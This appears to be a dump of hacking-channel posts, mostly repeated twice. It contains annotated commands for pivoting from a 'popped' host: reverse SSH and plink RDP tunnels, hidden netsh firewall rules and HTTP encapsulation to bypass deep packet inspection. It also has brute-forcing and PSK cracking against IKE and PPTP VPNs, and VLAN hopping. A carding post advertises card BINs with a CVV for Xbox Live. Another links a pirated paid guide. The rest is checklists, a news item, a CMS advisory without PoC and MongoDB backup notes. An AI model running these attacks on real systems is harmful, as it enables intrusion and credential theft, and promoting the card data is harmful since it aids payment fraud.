π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
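# Setting up an Ethernet bridge (transparent tap between two segments).
# bridge-utils is the legacy tool set; the same bridge can be built with iproute2 (`ip link add br0 type bridge`).
sudo apt-get install bridge-utils
# Stop NetworkManager and the host firewall first: NetworkManager will re-configure the member
# interfaces under you, and a default-deny firewall silently drops the bridged frames.
# Configuration: clear the addresses on both members, create br0, enslave eth0/eth1, bring the bridge up.
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
# The bridge was created as br0 above; the original note used "mybridge" here, which names no interface.
ifconfig br0 up
# Optional: only needed if the bridging box itself must be reachable (it makes the box visible on the segment).
dhclient br0
# Sniff everything crossing the bridge (needs root).
sudo tcpdump -i br0
# Adding routes with net-tools: -net spells out that the target is a prefix, not a host.
# iproute2 equivalent: ip route add 192.168.1.0/24 via 10.10.0.43
route add -net 192.168.1.0/24 gw 10.10.0.43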
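# Port forwarding with rinetd: accept traffic on a given IP:port and redirect it to a different IP:port.
apt-get install rinetd
cat /etc/rinetd.conf
# bindaddress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# Anyone who can reach w.x.y.z:53 is forwarded to a.b.c.d:80; rinetd.conf also takes allow/deny lines -
# use them to limit which sources may use the relay rather than leaving it open.
# SSH local port forwarding: <local port> on this box -> via <gateway> -> <remotehost>:<remote port>.
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH dynamic port forwarding: ssh -D opens a SOCKS (4 and 5) proxy on the attacking box; each connection made
# through it exits from <target> towards any host in the DMZ on any TCP port. SOCKS carries TCP only - no UDP, no ICMP.
# (The original had no space between <remote port> and <target>.)
ssh -D <local proxy port> -p <remote port> <target>
# Proxychains - perform an nmap scan inside a DMZ from an external computer.
# Reverse SSH tunnel from the popped machine: its local :22 becomes reachable on the relay's :2222.
# -f background, -N no remote command, -T no tty. The relay exposes the port on 127.0.0.1 only unless GatewayPorts is set.
# Note what this grants: whoever can log in to the relay can now reach the popped box's sshd - use key auth, not a password.
ssh -f -N -T -R 22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Dynamic (SOCKS) forward on 8080 through the :2222 reverse tunnel.
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# nmap through the SOCKS server with proxychains. A SOCKS proxy can only open TCP connections, so the scan
# must be a full connect scan (-sT) with host discovery disabled (-Pn); SYN/UDP/ICMP probes never leave the proxy.
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP tunneling - quick connectivity check against the tunnel endpoint (-vv verbose, -n no DNS lookups).
nc -vvn $ip 8888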
π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
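# Setting up an Ethernet bridge (transparent tap between two segments).
# bridge-utils is the legacy tool set; the same bridge can be built with iproute2 (`ip link add br0 type bridge`).
sudo apt-get install bridge-utils
# Stop NetworkManager and the host firewall first: NetworkManager will re-configure the member
# interfaces under you, and a default-deny firewall silently drops the bridged frames.
# Configuration: clear the addresses on both members, create br0, enslave eth0/eth1, bring the bridge up.
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
# The bridge was created as br0 above; the original note used "mybridge" here, which names no interface.
ifconfig br0 up
# Optional: only needed if the bridging box itself must be reachable (it makes the box visible on the segment).
dhclient br0
# Sniff everything crossing the bridge (needs root).
sudo tcpdump -i br0
# Adding routes with net-tools: -net spells out that the target is a prefix, not a host.
# iproute2 equivalent: ip route add 192.168.1.0/24 via 10.10.0.43
route add -net 192.168.1.0/24 gw 10.10.0.43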
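# Port forwarding with rinetd: accept traffic on a given IP:port and redirect it to a different IP:port.
apt-get install rinetd
cat /etc/rinetd.conf
# bindaddress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# Anyone who can reach w.x.y.z:53 is forwarded to a.b.c.d:80; rinetd.conf also takes allow/deny lines -
# use them to limit which sources may use the relay rather than leaving it open.
# SSH local port forwarding: <local port> on this box -> via <gateway> -> <remotehost>:<remote port>.
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH dynamic port forwarding: ssh -D opens a SOCKS (4 and 5) proxy on the attacking box; each connection made
# through it exits from <target> towards any host in the DMZ on any TCP port. SOCKS carries TCP only - no UDP, no ICMP.
# (The original had no space between <remote port> and <target>.)
ssh -D <local proxy port> -p <remote port> <target>
# Proxychains - perform an nmap scan inside a DMZ from an external computer.
# Reverse SSH tunnel from the popped machine: its local :22 becomes reachable on the relay's :2222.
# -f background, -N no remote command, -T no tty. The relay exposes the port on 127.0.0.1 only unless GatewayPorts is set.
# Note what this grants: whoever can log in to the relay can now reach the popped box's sshd - use key auth, not a password.
ssh -f -N -T -R 22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Dynamic (SOCKS) forward on 8080 through the :2222 reverse tunnel.
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# nmap through the SOCKS server with proxychains. A SOCKS proxy can only open TCP connections, so the scan
# must be a full connect scan (-sT) with host discovery disabled (-Pn); SYN/UDP/ICMP probes never leave the proxy.
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP tunneling - quick connectivity check against the tunnel endpoint (-vv verbose, -n no DNS lookups).
nc -vvn $ip 8888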
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
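# httptunnel (hts/htc): wrap an arbitrary TCP stream in HTTP so it passes proxies and DPI that only allow web traffic.
# Server side: hts listens on 80 and hands the unwrapped stream to <server ip addr>:<port of your app>.
sudo hts -F <server ip addr>:<port of your app> 80
# Client side: htc listens locally on <port of your app> and reaches the server's :80 through the HTTP proxy -P.
# The original line ended with a stray "stunnel" token, which htc does not take. The tunnel itself is plaintext
# HTTP; if the inner protocol is sensitive, wrap it in TLS (e.g. with stunnel) rather than relying on the proxy.
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80
# Tunnel Remote Desktop (RDP) from a popped Windows machine to your network with plink (PuTTY's ssh client).
# Tunnel on port 22: the popped box's 3389 becomes reachable on <remote host>'s loopback :3389.
# -pw leaves the password in the victim's process list and command history; prefer key auth (-i key.ppk)
# or -pwfile in recent PuTTY. Unattended use also needs -batch (and -hostkey <fingerprint> to pin the relay's
# key), otherwise plink blocks on the host-key prompt. The original notes carried a literal password here;
# it is replaced with a placeholder.
plink -l root -pw <password> -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try 80 or 443. plink's port flag is "-P <port>" as a separate argument (the original had "-P80").
plink -l root -pw <password> -R 3389:<local host>:3389 <remote host> -P 80
# RDP tunnel over an HTTP tunnel (DPI bypass): add the firewall rules on the Windows box without prompting the user.
# Needs an elevated shell; program= expects the full path to the executable. These are persistent inbound
# allow rules - log them and remove them when done:
#   netsh advfirewall firewall delete rule name="httptunnel_client"   (and likewise for "3000", "1080", "1079")
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client (per the note it accepts connections on localhost:3000 and wraps them in HTTP).
httptunnel_client.exe
# Run the plink reverse tunnel through the local http tunnel client: plink connects to localhost:3000, the
# tunnel carries the ssh session out as HTTP, and the -R forward exposes RDP on the far side as above.
# (The original called this an "HTTP reverse shell"; it is the same RDP tunnel, just encapsulated.)
plink -l root -pw <password> -R 3389:<local host>:3389 localhost -P 3000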
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
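# httptunnel (hts/htc): wrap an arbitrary TCP stream in HTTP so it passes proxies and DPI that only allow web traffic.
# Server side: hts listens on 80 and hands the unwrapped stream to <server ip addr>:<port of your app>.
sudo hts -F <server ip addr>:<port of your app> 80
# Client side: htc listens locally on <port of your app> and reaches the server's :80 through the HTTP proxy -P.
# The original line ended with a stray "stunnel" token, which htc does not take. The tunnel itself is plaintext
# HTTP; if the inner protocol is sensitive, wrap it in TLS (e.g. with stunnel) rather than relying on the proxy.
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80
# Tunnel Remote Desktop (RDP) from a popped Windows machine to your network with plink (PuTTY's ssh client).
# Tunnel on port 22: the popped box's 3389 becomes reachable on <remote host>'s loopback :3389.
# -pw leaves the password in the victim's process list and command history; prefer key auth (-i key.ppk)
# or -pwfile in recent PuTTY. Unattended use also needs -batch (and -hostkey <fingerprint> to pin the relay's
# key), otherwise plink blocks on the host-key prompt. The original notes carried a literal password here;
# it is replaced with a placeholder.
plink -l root -pw <password> -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try 80 or 443. plink's port flag is "-P <port>" as a separate argument (the original had "-P80").
plink -l root -pw <password> -R 3389:<local host>:3389 <remote host> -P 80
# RDP tunnel over an HTTP tunnel (DPI bypass): add the firewall rules on the Windows box without prompting the user.
# Needs an elevated shell; program= expects the full path to the executable. These are persistent inbound
# allow rules - log them and remove them when done:
#   netsh advfirewall firewall delete rule name="httptunnel_client"   (and likewise for "3000", "1080", "1079")
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client (per the note it accepts connections on localhost:3000 and wraps them in HTTP).
httptunnel_client.exe
# Run the plink reverse tunnel through the local http tunnel client: plink connects to localhost:3000, the
# tunnel carries the ssh session out as HTTP, and the -R forward exposes RDP on the far side as above.
# (The original called this an "HTTP reverse shell"; it is the same RDP tunnel, just encapsulated.)
plink -l root -pw <password> -R 3389:<local host>:3389 localhost -P 3000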
π¦ VPN hacking methods & more
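# VPN hacking - IKE/IPsec endpoints (UDP/500).
# Identify VPN servers (udp-protocol-scanner sends a protocol-specific probe and reports responders):
./udp-protocol-scanner.pl -p ike $ip
# Scan a range for VPN servers (one target per line in ip.txt):
./udp-protocol-scanner.pl -p ike -f ip.txt
# IKEForce: enumerate IKE group names or dictionary-attack XAUTH credentials (Python 2-era tool; pyip is its dependency).
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Enumerate valid group IDs: -e enumerate, -w wordlist. (The original had its dashes mangled into "Γ’β¬β".)
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
# Brute-force XAUTH (-b) once the group id (-i) and PSK (-k) are known: -u user, -w password list, -s speed setting.
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
# ike-scan: capture the PSK hash. This only works against IKEv1 aggressive mode (-A): there the responder
# returns a hash derived from the PSK before the initiator has proven anything, so it can be cracked offline.
# Main-mode-only configuration closes this; note it as the remediation.
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
# --id presents a group/identity (often required before the gateway answers); -P writes the hash in psk-crack format.
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
# -M multi-line output, -n <id> is the same as --id. (The "example\_group" in the original was a markdown escape.)
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
# psk-crack: crack the captured hash offline. With only the hash file it runs its default dictionary.
# (The bare "pskcrack" line in the original was a typo for psk-crack.)
psk-crack hash-file.txt
# Brute-force mode: -b <max length>, optionally with a restricted --charset (the original charset had a doubled "3").
psk-crack -b 5 TARGET-IP-key
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
# Dictionary mode with an explicit wordlist:
psk-crack -d /path/to/dictionary-file TARGET-IP-key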
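# PPTP hacking. Identifying PPTP: the control channel listens on TCP/1723 (data rides on GRE).
# Nmap PPTP fingerprint: -Pn skip host discovery, -sV grab the service banner. (Dashes were mangled in the original.)
nmap -Pn -sV -p 1723 <targets>
# PPTP dictionary attack. thc-pptp-bruter takes the target as its final argument - the original omitted it.
# -u user, -W toggles the tool's Windows-specific workaround (see its usage text), -w wordlist (stdin also works).
# PPTP's MS-CHAPv2 authentication is considered broken irrespective of password strength; its presence is a finding on its own.
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst <target ip>
# VLAN hopping with frogger (nccgroup). The script lives inside the cloned directory, so change into it first;
# the original also had a stray backtick after ./frogger.sh.
git clone https://github.com/nccgroup/vlan-hopping.git
cd vlan-hopping
chmod 700 frogger.sh
./frogger.sh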
π¦ VPN hacking methods & more
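# VPN hacking - IKE/IPsec endpoints (UDP/500).
# Identify VPN servers (udp-protocol-scanner sends a protocol-specific probe and reports responders):
./udp-protocol-scanner.pl -p ike $ip
# Scan a range for VPN servers (one target per line in ip.txt):
./udp-protocol-scanner.pl -p ike -f ip.txt
# IKEForce: enumerate IKE group names or dictionary-attack XAUTH credentials (Python 2-era tool; pyip is its dependency).
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Enumerate valid group IDs: -e enumerate, -w wordlist. (The original had its dashes mangled into "Γ’β¬β".)
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
# Brute-force XAUTH (-b) once the group id (-i) and PSK (-k) are known: -u user, -w password list, -s speed setting.
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
# ike-scan: capture the PSK hash. This only works against IKEv1 aggressive mode (-A): there the responder
# returns a hash derived from the PSK before the initiator has proven anything, so it can be cracked offline.
# Main-mode-only configuration closes this; note it as the remediation.
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
# --id presents a group/identity (often required before the gateway answers); -P writes the hash in psk-crack format.
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
# -M multi-line output, -n <id> is the same as --id. (The "example\_group" in the original was a markdown escape.)
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
# psk-crack: crack the captured hash offline. With only the hash file it runs its default dictionary.
# (The bare "pskcrack" line in the original was a typo for psk-crack.)
psk-crack hash-file.txt
# Brute-force mode: -b <max length>, optionally with a restricted --charset (the original charset had a doubled "3").
psk-crack -b 5 TARGET-IP-key
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
# Dictionary mode with an explicit wordlist:
psk-crack -d /path/to/dictionary-file TARGET-IP-key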
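# PPTP hacking. Identifying PPTP: the control channel listens on TCP/1723 (data rides on GRE).
# Nmap PPTP fingerprint: -Pn skip host discovery, -sV grab the service banner. (Dashes were mangled in the original.)
nmap -Pn -sV -p 1723 <targets>
# PPTP dictionary attack. thc-pptp-bruter takes the target as its final argument - the original omitted it.
# -u user, -W toggles the tool's Windows-specific workaround (see its usage text), -w wordlist (stdin also works).
# PPTP's MS-CHAPv2 authentication is considered broken irrespective of password strength; its presence is a finding on its own.
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst <target ip>
# VLAN hopping with frogger (nccgroup). The script lives inside the cloned directory, so change into it first;
# the original also had a stray backtick after ./frogger.sh.
git clone https://github.com/nccgroup/vlan-hopping.git
cd vlan-hopping
chmod 700 frogger.sh
./frogger.sh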
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User-Agent (e.g. mobile sites, or content served only to a search-engine crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User-Agent (e.g. mobile sites, or content served only to a search-engine crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
π¦ Steps for good configuration-management testing:
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policy files (e.g. Flash crossdomain.xml, Silverlight clientaccesspolicy.xml, robots.txt)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
π¦ Steps for good configuration-management testing:
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policy files (e.g. Flash crossdomain.xml, Silverlight clientaccesspolicy.xml, robots.txt)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
β
x3 Bins For Xbox Live
Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00
Date: 22/07
CVV : 706
IP : USA πΊπΈ
only verified by Us
Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00
Date: 22/07
CVV : 706
IP : USA πΊπΈ
only verified by Us
π¦ Britain, the United States and Canada say Russian intelligence agencies are trying to steal COVID-19 vaccine research
#News
> The governments of the United Kingdom, the United States and Canada accused Russian intelligence services of hacking into international pharmaceutical and academic research institutions in an effort to win the race to develop a Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
π¦ Britain, the United States and Canada say Russian intelligence agencies are trying to steal COVID-19 vaccine research
#News
> The governments of the United Kingdom, the United States and Canada accused Russian intelligence services of hacking into international pharmaceutical and academic research institutions in an effort to win the race to develop a Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
Forwarded from Backup Legal Mega
Paid guide LinuxPrivelegeEscalation Full by cybermentor:
https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -
https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -
π¦INTERESTING NEW BUG- DESCRIPTION :
> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use.It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."
> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files whose filename contains a malicious client-side script. The script executes in the browser of any user who visits the manipulated URL, so the admin-only requirement does not limit who is affected.
2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.
3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.
π¦Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
2. Directory Traversal (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
3. Upload of arbitrary files (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
π¦Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 was tested, which was the latest version available at the time of the test. Previous versions may also be affected. On 18-05-2020 the vendor released a newer version, 3.1.0; according to the advisory that version is still vulnerable to the issues above. Re-test against the current release before relying on this, as the advisory predates any later fixes.
source deeepweb
π¦INTERESTING NEW BUG- DESCRIPTION :
> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use.It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."
> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files whose filename contains a malicious client-side script. The script executes in the browser of any user who visits the manipulated URL, so the admin-only requirement does not limit who is affected.
2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.
3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.
π¦Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
2. Directory Traversal (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
3. Upload of arbitrary files (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
π¦Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 was tested, which was the latest version available at the time of the test. Previous versions may also be affected. On 18-05-2020 the vendor released a newer version, 3.1.0; according to the advisory that version is still vulnerable to the issues above. Re-test against the current release before relying on this, as the advisory predates any later fixes.
source deeepweb
π¦MongoDB database backup and recovery
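# MongoDB backup and recovery. (Comments use '#': the original's '//' lines are not comments in a shell and would be executed.)
# The Windows paths (D:\bak) are kept from the original note; under bash they must be quoted or the backslashes are eaten.
# Back up the entire database to a directory as a BSON dump: -h host, -d database, -o output directory.
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak
# Restore the entire database. The original wrote "mongodump" here; restoring is mongorestore, and the dump
# directory is a positional argument (-d would name the target database, not the source directory).
mongorestore -h dbhost -u user -p pass dbdirectory
# Straight quotes (the original had curly ones, which the shell passes through literally).
# Giving the password to -p puts it in the process list and shell history; pass -p with no value to be prompted,
# or supply credentials via --config pointing at a permission-restricted file.
mongorestore -h 192.168.0.2 -u "root" -p "123" D:\bak
# Back up only one collection (mytable) to a directory.
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable
# Restore a single collection from that directory into mydatabase.
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
# mongoexport can also back up a single collection, but it writes a JSON (or CSV) text export rather than a BSON
# dump, so it is a logical export, not a byte-faithful backup.
mongoexport -h dbhost -d dbname -c collectionname -o dbdirectoryfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak
# Restore a mongoexport file into a collection with mongoimport. The file option is --file (the original had "-file").
mongoimport -h dbhost -d dbname -c collectionname --file dbdirectoryfile
mongoimport -h 192.168.0.2 -d mydatabase -c mytable --file E:\bak\mytable.bak
# Dumps and exports hold the data in the clear: keep them off world-readable paths and restrict network access to dbhost.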
π¦MongoDB database backup and recovery
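# MongoDB backup and recovery. (Comments use '#': the original's '//' lines are not comments in a shell and would be executed.)
# The Windows paths (D:\bak) are kept from the original note; under bash they must be quoted or the backslashes are eaten.
# Back up the entire database to a directory as a BSON dump: -h host, -d database, -o output directory.
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak
# Restore the entire database. The original wrote "mongodump" here; restoring is mongorestore, and the dump
# directory is a positional argument (-d would name the target database, not the source directory).
mongorestore -h dbhost -u user -p pass dbdirectory
# Straight quotes (the original had curly ones, which the shell passes through literally).
# Giving the password to -p puts it in the process list and shell history; pass -p with no value to be prompted,
# or supply credentials via --config pointing at a permission-restricted file.
mongorestore -h 192.168.0.2 -u "root" -p "123" D:\bak
# Back up only one collection (mytable) to a directory.
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable
# Restore a single collection from that directory into mydatabase.
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
# mongoexport can also back up a single collection, but it writes a JSON (or CSV) text export rather than a BSON
# dump, so it is a logical export, not a byte-faithful backup.
mongoexport -h dbhost -d dbname -c collectionname -o dbdirectoryfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak
# Restore a mongoexport file into a collection with mongoimport. The file option is --file (the original had "-file").
mongoimport -h dbhost -d dbname -c collectionname --file dbdirectoryfile
mongoimport -h 192.168.0.2 -d mydatabase -c mytable --file E:\bak\mytable.bak
# Dumps and exports hold the data in the clear: keep them off world-readable paths and restrict network access to dbhost.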